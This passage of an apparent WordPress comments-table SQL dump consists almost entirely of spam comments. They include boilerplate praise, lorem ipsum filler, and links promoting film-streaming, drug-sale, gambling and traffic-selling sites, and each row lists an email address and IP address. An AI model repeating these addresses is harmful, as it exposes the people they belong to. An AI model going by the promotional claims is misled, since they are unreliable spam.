Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2218,5352,'mp3','ninar_10@yahoo.com','https://www.hdfilmcehennemi2.pw/','45.136.231.153','2021-02-09 08:04:11','2021-02-09 08:04:11','Good post! We will be linking to this particularly great post on our site. Keep up the good writing. Lisette Bald Lindahl',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2219,4652,'diziler','mweyant@sbcglobal.net','https://www.hdfilmcehennemi2.pw/','45.92.247.12','2021-02-09 09:31:02','2021-02-09 09:31:02','Hello Faizan, our minimum order is 1kg. We do not offer free shipping but, if you order up to 10kg shipping is still 4,000 won and if you order 11-20kg shipping is 5,000won Dory Jo Debi',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2220,4713,'diziler','sallygreenberg@gmail.com','https://www.hdfilmcehennemi2.pw/kategori/fragman','45.142.28.223','2021-02-09 09:33:10','2021-02-09 09:33:10','Hello, I wish for to subscribe for this website to take latest updates, thus where can i do it please help out. Tess Fields Quillon',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2221,5352,'mp3','neunmts@yahoo.com','https://www.hdfilmcehennemi2.pw/','45.130.60.3','2021-02-09 10:30:51','2021-02-09 10:30:51','cheers considerably this amazing site can be conventional and also casual Annie Hendrick Babbette',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2222,4713,'dizi','preppyf@yahoo.com','https://www.hdfilmcehennemi2.pw/kategori/tavsiye-filmler-izle','193.8.231.196','2021-02-09 10:50:06','2021-02-09 10:50:06','Thank you so miuch Kimberly! Do you know why antibiotics work if the issue is hormonal? When my son is on antibiotics, he is not irritable anymore, he progresses a lot, etc. Anasely Myrilla Price Rog',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2223,4652,'diziler','nycdkr@yandex.com','https://www.hdfilmcehennemi2.pw/','45.130.255.59','2021-02-09 10:50:06','2021-02-09 10:50:06','Donec sed fringilla dui. Suspendisse faucibus sodales urna, id fermentum sapien molestie sit amet. Tildie Lee Lucie',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2224,4652,'dizi','pocketsimon@msn.com','https://www.hdfilmcehennemi2.pw/','45.86.15.147','2021-02-09 12:19:57','2021-02-09 12:19:57','Really nice design and good subject material. Please also check my website. I love cars! Kyrstin Lovell Lazarus',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2225,4713,'mp3','ninaboo1@yahoo.com','https://www.hdfilmcehennemi2.pw/kategori/fragman','45.128.24.242','2021-02-09 12:20:00','2021-02-09 12:20:00','Hello. splendid job. I did not expect this. This is a splendid story. Thanks! Rozalin Lock Mario',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2226,4659,'diziler','mikebetts1@msn.com','https://www.hdfilmcehennemi2.pw/','45.87.248.39','2021-02-09 13:25:33','2021-02-09 13:25:33','This is my first time pay a quick visit at here and i am actually happy to read everthing at single place. Daisy Levy Riesman',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2227,5060,'dizi','sanchezhandymen@yahoo.com','https://www.hdfilmcehennemi2.pw/kategori/eski-filmler','2.56.101.114','2021-02-09 13:25:44','2021-02-09 13:25:44','Muchas gracias por ayudarme a solucionar mi problema. Sumamente conforme con su ayuda Delia Whit Mariande',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2228,4819,'diziler','monicalfranco@gmail.com','https://filmkovasi.org/','45.142.28.132','2021-02-09 21:00:40','2021-02-09 21:00:40','In vitae risus maximus odio ultricies imperdiet. Suspendisse porttitor nec ante at pellentesque. Duis diam leo, placerat non feugiat vel, dapibus id tortor. In ut sollicitudin neque. Aliquam cursus, orci quis vulputate tempus, orci odio tempus nulla, eu feugiat felis leo quis enim. Phasellus commodo ex lectus, quis volutpat tellus luctus vitae. Katherina Benoit Stilwell',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2231,4819,'hindi movie','petercle7@gmail.com','https://filmkovasi.org/','45.152.208.239','2021-02-09 22:35:39','2021-02-09 22:35:39','Roeingm dolor sit amet, consectetur adipiscing elit. Morbi tempus arcu nec tortor pellentesque lacini esque lisern paose liersl iesluenr mi dapibus tempus lobortis. Davine Demetrius Ingraham',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2234,4659,'watch','natiesha1@yandex.com','https://filmkovasi.org/','45.130.60.33','2021-02-10 03:48:26','2021-02-10 03:48:26','Hi! Do you know of a better place to get banh cuon in Vancouver? Audrie Izzy Jago',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2237,5054,'turkce','rhienna@yahoo.com','https://filmkovasi.org/','45.87.249.62','2021-02-10 05:35:11','2021-02-10 05:35:11','Jessica I am so sorry to hear you are experiencing issues with your eBook. I have reached out to customer support and someone from that team with DM you shortly. Adelina Rabi Benedix',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2238,4674,'Dan Arroyo','arroyo.dan@gmail.com','','185.95.157.39','2021-02-10 06:22:38','2021-02-10 06:22:38','Hello\r\n \r\nYOU NEED QUALITY VISITORS FOR YOUR: tummyrevolution.com ?\r\n \r\nWE PROVIDE HIGH-QUALITY VISITORS WITH:\r\n- 100% safe for your site\r\n- real visitors with unique IPs. No bots, proxies, or datacenters\r\n- visitors from Search Engine (by keyword)\r\n- visitors from Social Media Sites (referrals)\r\n- visitors from any country you want (USA/UK/CA/EU…)\r\n- very low bounce rate\r\n- very long visit duration\r\n- multiple pages visited\r\n- tractable in google analytics\r\n- custom URL tracking provided\r\n- boost ranking in SERP, SEO, profit from CPM\r\n \r\nCLAIM YOUR 24 HOURS FREE TEST HERE=> ventfara@mail.com\r\n \r\n \r\nThanks, Dan Arroyo',0,'0','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','comment',0,0),(2239,4819,'dublaj','oya198059@gmail.com','https://filmkovasi.org/','45.137.43.177','2021-02-10 06:40:04','2021-02-10 06:40:04','Once you get that done, just start sharing content! Remember the tips in this article, if you to run a successful blog. Sound Tips To Be A Better Soccer Player Astrid Fremont Drain',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2241,4659,'bluray','peterpage@mail.com','https://filmkovasi.org/tur/korku','45.86.15.66','2021-02-10 07:59:18','2021-02-10 07:59:18','When I originally left a comment I appear to have clicked the -Notify me when new comments are added- checkbox and now whenever a comment is added I receive 4 emails with the exact same comment. There has to be an easy method you can remove me from that service? Cheers! Kayle Grange Stafford',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2242,5054,'online','porlake@yandex.com','https://filmkovasi.org/en-cok-begenilenler','193.8.231.69','2021-02-10 08:02:22','2021-02-10 08:02:22','Way cool! Some very valid points! I appreciate you writing this write-up and the rest of the website is really good. Francesca Otto Correy',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2243,5060,'dublaj','mutluluk.ans@gmail.com','https://filmkovasi.org/','45.8.134.221','2021-02-10 09:22:31','2021-02-10 09:22:31','Hey, you used to write wonderful, but the last several posts have been kinda boringK I miss your great writings. Past few posts are just a bit out of track! come on! Jinny Nikolaos Suzie',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2246,4659,'kesintisiz','noeg1970@yahoo.com','https://filmkovasi.org/','45.137.40.58','2021-02-10 11:29:55','2021-02-10 11:29:55','Wonderful beat ! I wish to apprentice while you amend your site, how could i subscribe for a blog site? The account helped me a acceptable deal. I had been a little bit acquainted of this your broadcast offered bright clear idea Alina Parrnell Duval',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2247,5352,'lost','ninaclev@yahoo.com','https://filmkovasi.org/','2.56.101.159','2021-02-10 12:37:43','2021-02-10 12:37:43','whoah this weblog is wonderful i really like reading your articles. Marlie Wesley Gurango',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2248,4819,'dizi','ogulliver7cwl@yahoo.com','https://filmkovasi.org/','2.56.101.27','2021-02-10 13:22:20','2021-02-10 13:22:20','I want to show thanks to this writer for rescuing me from such a circumstance. Damaris Herold Rolandson',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2249,4659,'torrent','sodapopcr@msn.com','https://filmkovasi.org/','45.9.122.203','2021-02-10 13:22:34','2021-02-10 13:22:34','Nothing yet. It is not listed in Uplay Store in Colombia. Mireille Ugo Sevik',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2250,5054,'turkce','plaistedr@bellsouth.net','https://filmkovasi.org/','45.87.249.16','2021-02-10 13:27:37','2021-02-10 13:27:37','Great post, you have pointed out some excellent points, I as well believe this is a very superb website. Chloette Giff Idaline',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2251,4819,'diziler','norrad.a@gmail.com','https://filmkovasi.org/','185.95.157.37','2021-02-10 14:36:37','2021-02-10 14:36:37','Hey there. I discovered your blog by means of Google at the same time as looking for a related topic, your web site came up. It seems great. I have bookmarked it in my google bookmarks to come back then. Mahala Daven Fleming',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2253,5054,'dizi','slither2312@verizon.net','https://filmkovasi.org/','45.152.202.228','2021-02-10 15:01:32','2021-02-10 15:01:32','I dugg some of you post as I thought they were very beneficial invaluable Jacquelynn Garik Finnigan',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2254,4819,'amateur','paul-laberge@sympatico.ca','https://filmkovasi.org/','185.95.157.194','2021-02-10 16:06:29','2021-02-10 16:06:29','I love a fun enemies to lovers romance. This sounds good. Sindee Erasmus Fredi',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2255,4659,'bedava','pmarziano@comcast.net','https://filmkovasi.org/','45.130.60.219','2021-02-10 16:06:35','2021-02-10 16:06:35','I blog quite often and I genuinely thank you for your content. This great article has truly peaked my interest. I will bookmark your website and keep checking for new details about once per week. I opted in for your RSS feed as well. Marge Pietrek Finny',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2256,5054,'dizi','milabcastillo@yahoo.com','https://filmkovasi.org/','45.135.36.215','2021-02-10 16:32:56','2021-02-10 16:32:56','I like reading an article that can make men and women think. Also, thanks for allowing for me to comment! Ardelle Philbert Beck',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2258,4659,'yabanci','olgacabeza@yahoo.com','https://filmkovasi.org/','45.137.43.131','2021-02-10 17:29:18','2021-02-10 17:29:18','There are some intriguing points in this write-up however I don?t understand if I see all of them facility to heart. There is some legitimacy yet I will certainly hold viewpoint until I explore it better. Good post, many thanks as well as we want extra! Added to FeedBurner too Alika Davidson Blount',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2260,4819,'torrent','schuman_lori@yahoo.com','https://filmkovasi.org/','45.154.56.235','2021-02-10 20:47:54','2021-02-10 20:47:54','Wow, marvelous blog layout! How long have you been blogging for? you made blogging look easy. The overall look of your website is excellent, as well as the content!| Nisse Phillipe Barbie',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2262,4652,'dizi','paromero57@yahoo.com','https://filmkovasi.org/','45.87.248.70','2021-02-10 21:25:34','2021-02-10 21:25:34','I like the helpful information you provide in your articles. Marj Adolphus Leroy',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2273,4659,'erotik','ognomoney1@gmail.com','https://filmkovasi.org/','45.9.122.101','2021-02-11 16:23:10','2021-02-11 16:23:10','You have made some really good points there. I checked on the internet for more information about the issue and found most people will go along with your views on this web site. Bonnibelle Morlee Timi',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2275,5054,'erotik','soraya_248@gmail.com','https://filmkovasi.org/','45.136.231.23','2021-02-11 17:02:45','2021-02-11 17:02:45','Trader has three important factors, psychology, discipline and a trading system Bellanca Efrem Wisnicki',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2276,2132,'Headache medications for sale','headachemedi345@gmail.com','https://headachemedi.com/','89.76.208.202','2021-02-11 17:05:22','2021-02-11 17:05:22','Thanks for your tips. One thing we have noticed is always that banks and also financial institutions have in mind the spending behavior of consumers and also understand that a lot of people max out there their own credit cards around the holiday seasons. They prudently take advantage of this kind of fact and begin flooding the inbox and also snail-mail box together with hundreds of Zero APR card offers immediately after the holiday season comes to an end. Knowing that in case you are like 98% of all American open public, you\'ll hop at the possiblity to consolidate personal credit card debt and move balances for 0 interest rates credit cards. gggffhk https://headachemedi.com - Headache medications for sale',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36','comment',0,0),(2279,4652,'erotik','portia25@yandex.com','https://filmkovasi.org/','45.8.134.59','2021-02-12 02:58:47','2021-02-12 02:58:47','nulla sit amet est. Curabitur augue. Sed nec magna vel est auctor porttitor. Integer at lorem. Sed et turpis nec lorem consectetur volutpat. Donec vestibulum cursus mauris. Nullam blandit urna quis nibh. Proin sollici Stefa Hodge Presber',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2280,5054,'turkce','mmdinova@rogers.com','https://filmkovasi.org/kalite/720p','45.130.60.33','2021-02-12 05:34:29','2021-02-12 05:34:29','It was fascinating bearing in mind I found this website, because it has enormously useful content for many people. I wish my Sbobet website can be as soon as this website. Marinna Jimmy Carmel',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2281,5054,'turkce','ogre@yandex.com','https://filmkovasi.org/kategori/yabanci-filmler','185.95.157.219','2021-02-12 06:44:43','2021-02-12 06:44:43','Way cool! Some very valid points! I appreciate you penning this post and also the rest of the site is also very good. Sondra Stacy Ivy',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2283,5054,'erotik','nanner75@comcast.net','https://filmkovasi.org/','45.130.255.68','2021-02-12 11:01:49','2021-02-12 11:01:49','Everything is very open with a clear explanation of the challenges. It was definitely informative. Your site is very helpful. Thanks for sharing! Sheila Nestor Jangro',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2285,5054,'erotik','princessngurl@yahoo.com','https://filmkovasi.org/kalite/720p','45.92.247.221','2021-02-12 14:00:34','2021-02-12 14:00:34','You completed a few fine points there. I did a search on the theme and found mainly persons will go along with with your blog. Corissa Doyle Delfine',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2286,5054,'erotik','porotis@yandex.com','https://filmkovasi.org/kategori/yabanci-filmler','45.130.60.135','2021-02-12 15:18:54','2021-02-12 15:18:54','This is one awesome article. Much thanks again. Really Great. Tasia Terrell Haymes',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2291,5054,'erotik','stevek1821@yandex.com','https://filmkovasi.org/','45.154.56.154','2021-02-12 19:36:44','2021-02-12 19:36:44','After I originally left a comment I seem to have clicked the -Notify me when new comments are added- checkbox and now each time a comment is added I recieve four emails with the same comment. Is there a way you can remove me from that service? Appreciate it! Hedy Noby Lorena',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2295,5054,'erotik','morgcomm@msn.com','https://filmkovasi.org/','193.8.231.69','2021-02-13 08:58:31','2021-02-13 08:58:31','Im thankful for the blog article. Really thank you! Really Great. Genna Nestor Dopp',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2296,4819,'erotik','oceantoys@yandex.com','https://filmkovasi.org/','185.95.157.156','2021-02-13 10:06:46','2021-02-13 10:06:46','Thanks for a marvelous posting! I truly enjoyed reading it, you are a great author. I will remember to bookmark your blog and will come back in the foreseeable future. I want to encourage that you continue your great posts, have a nice weekend!| Lisha Levey Druci',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2297,5054,'erotik','sirjdom@yandex.com','https://filmkovasi.org/','193.23.245.12','2021-02-13 10:07:22','2021-02-13 10:07:22','Hello to all, the contents existing at this web site are really remarkable for people knowledge, well, keep up the nice work fellows.| Fenelia Winifield Gleich',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2298,4819,'turkce','mindyzeifman@gmail.com','https://filmkovasi.org/','45.137.40.39','2021-02-13 11:03:48','2021-02-13 11:03:48','Cheap Gucci Shoes For Men Amaze! I have been searching yahoo for a long time for the i ultimately found it on this page! Gwendolyn Colin Alvin',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2299,5060,'turkce','nikitogizmo@yandex.com','https://filmkovasi.org/','45.137.43.131','2021-02-13 11:12:30','2021-02-13 11:12:30','I agree with your opinion. From now on I will always support you. Madge Roderigo Akela',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2300,5354,'turkce','rudycouchman@gmail.com','https://filmkovasi.org/','45.142.28.79','2021-02-13 11:25:55','2021-02-13 11:25:55','Good post. I study something more difficult on different blogs everyday. Lyndell Charles Brigitte',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2301,4819,'turkce','pazpablo911@yahoo.com','https://filmkovasi.org/kalite/720p','45.142.28.132','2021-02-13 11:59:51','2021-02-13 11:59:51','I really like reading a post that can make people think. Also, thank you for allowing me to comment. Mignon Fowler Judie',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2302,5060,'turkce','paskiloco@gmail.com','https://filmkovasi.org/','45.137.43.88','2021-02-13 11:59:54','2021-02-13 11:59:54','We are the Best Online Togel Gambling Website in Indonesia which provides the Best Online Togel market we can get. Where the Togel market provided by us is the Singapore Togel and Hong Kong Togel. Licha Immanuel Roth',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2303,4652,'turkce','pault55@bellsouth.net','https://filmkovasi.org/kalite/720p','45.86.15.69','2021-02-13 13:19:47','2021-02-13 13:19:47','You CANT use the calculator, it adds points for 0 foods. You have to use recipe builder to get accurate points. Ambur Bentley Lief',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2305,5060,'turkce','mpbermeo022@yahoo.com','https://filmkovasi.org/','45.152.200.117','2021-02-13 13:25:31','2021-02-13 13:25:31','Everyone loves it when individuals come together and share thoughts. Yolanda Rriocard Kuster',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2306,4652,'turkce','mswilliamsx9@yandex.com','https://filmkovasi.org/yil/2020','45.130.60.19','2021-02-13 14:43:41','2021-02-13 14:43:41','Yes! Finally something about adventure travels vacation. Danella Elsworth Hodges',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2307,5060,'turkce','nila678@mail.com','https://filmkovasi.org/kalite/720p','45.86.15.150','2021-02-13 14:48:52','2021-02-13 14:48:52','Way cool! Some very valid points! I appreciate you penning this post and the rest of the site is also really good.| Maegan Bucky Nysa',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2308,4652,'turkce','patades@yahoo.com','https://filmkovasi.org/en-cok-begenilenler','45.142.28.77','2021-02-13 15:34:42','2021-02-13 15:34:42','Aute mi ut suspendisse velit leo, vel risus ac. Amet dui dignissim fermentum malesuada auctor volutpat, vestibulum ipsum nulla. Lauree Hillyer Johathan',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2309,5060,'turkce','nailz4u2no@yahoo.com','https://filmkovasi.org/en-cok-begenilenler','193.8.127.21','2021-02-13 15:40:08','2021-02-13 15:40:08','Someone essentially help to make seriously articles I would state. This is the very first time I frequented your web page and thus far? I surprised with the research you made to create this particular publish amazing. Magnificent job! Tanitansy Maximilian Annora',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2311,4652,'turkce','siknisted@yahoo.com','https://filmkovasi.org/kalite/4k','45.130.60.135','2021-02-13 16:40:43','2021-02-13 16:40:43','Thanks for the blog post. Much thanks again. Much obliged. Annice Scottie Harms',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2312,4652,'turkce','racheljean83@gmail.com','https://filmkovasi.org/tur/aile','45.86.15.150','2021-02-13 17:25:54','2021-02-13 17:25:54','Howdy! This post could not be written any better! Reading this post reminds me of my previous room mate! He always kept talking about this. I will forward this post to him. Pretty sure he will have a good read. Thank you for sharing! Eleanor Giraud Bendicta',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2314,4652,'turkce','pandasweety21@yahoo.com','https://filmkovasi.org/kalite/720p','45.155.70.26','2021-02-13 18:37:50','2021-02-13 18:37:50','Very good point which I had quickly initiate efficient initiatives without wireless web services. Interactively underwhelm turnkey initiatives before high-payoff relationships. Holisticly restore superior interfaces before flexible technology. Completely scale extensible relationships through empowered web-readiness. Rosemaria Elston Delaryd',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2315,4652,'turkce','nlzizka@yahoo.com','https://filmkovasi.org/en-cok-yorumlananlar','193.8.94.118','2021-02-13 19:10:39','2021-02-13 19:10:39','Oh my goodness! an outstanding article dude. Thanks Nonetheless I am experiencing issue with ur rss. Don?t know why Incapable to sign up for it. Is there anybody obtaining identical rss problem? Anybody that recognizes kindly react. Thnkx Melantha Nataniel Jordanson',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2316,4652,'turkce','nopierce@yahoo.com','https://filmkovasi.org/kategori/yabanci-filmler','45.158.185.41','2021-02-13 20:27:33','2021-02-13 20:27:33','If you are passionate about your blog topics, you will ultimately draw your readers in and your interest in the subject will show through. Andee Tome Maida',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2317,4652,'turkce','nigjl05@gmail.com','https://filmkovasi.org/en-cok-begenilenler','185.95.157.55','2021-02-13 22:08:14','2021-02-13 22:08:14','Thanks-a-mundo for the article post. Really looking forward to read more. Fantastic. Kameko Jozef Bough',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2318,4652,'turkce','mimienrique@yahoo.com','https://filmkovasi.org/en-cok-izlenenler','45.137.40.58','2021-02-13 23:21:47','2021-02-13 23:21:47','The day I photographed it, I half-and-halfed the flour. But I made it again all whole wheat and actually preferred it. Allx Bendick Halda',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2319,4652,'turkce','smackmouth@verizon.net','https://filmkovasi.org/tur/animasyon','45.152.208.204','2021-02-14 01:30:10','2021-02-14 01:30:10','Hi there Dear, are you in fact visiting this web page regularly, if so afterward you will definitely take nice experience. Vale Bordie Jilly',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2320,4652,'turkce','mroger2828@yandex.com','https://filmkovasi.org/kalite/480p','45.141.176.156','2021-02-14 02:31:32','2021-02-14 02:31:32','Donec eu mollis felis, a maximus augue. Phasellus mi dui, tincidunt id venenatis vel, luctus quis lorem. Curabitur a ante non leo eleifend pretium. Vivamus efficitur ex varius dignissim imperdiet. Cary Colman Mientao',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2322,4652,'turkce','mollysmama2@yahoo.com','https://filmkovasi.org/en-cok-yorumlananlar','45.94.47.182','2021-02-14 05:15:16','2021-02-14 05:15:16','Thank you for the auspicious writeup. It in fact was once a amusement account it. Glance advanced to far delivered agreeable from you! By the way, how could we communicate? Raina Berkeley Rubia',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; 